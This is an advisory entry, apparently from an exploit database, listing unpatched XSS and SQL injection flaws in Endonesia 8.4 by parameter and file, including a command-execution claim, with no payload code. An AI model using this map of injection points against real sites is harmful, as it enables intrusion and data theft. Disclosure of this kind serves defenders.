Vendor: Endonesia8.4
By: milw0rm.com
CVSS: 7,5 (HIGH)
Multiple XSS and SQL Injection
CWE: 89, 79
Product Name: Endonesia8.4
Affected Version From: Endonesia8.4
Affected Version To: Endonesia8.4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
bugs for Endonesia8.4
Multiple XSS and SQL Injection vulnerabilities in Endonesia8.4 allow remote attackers to inject arbitrary web script or HTML and to execute arbitrary SQL commands via the (1) mod parameter in mod.php, (2) friend parameter in friend.php, (3) maintext parameter in admin.php, (4) intypeid parameter in mod.php, (5) cid parameter in mod.php, (6) did parameter in mod.php, (7) cid parameter in katalog.php, and (8) cid parameter in diskusi.php. They also allow remote attackers to execute arbitrary commands via the did parameter in diskusi.php.
Mitigation:
Validate and sanitize input to prevent XSS and SQL Injection attacks.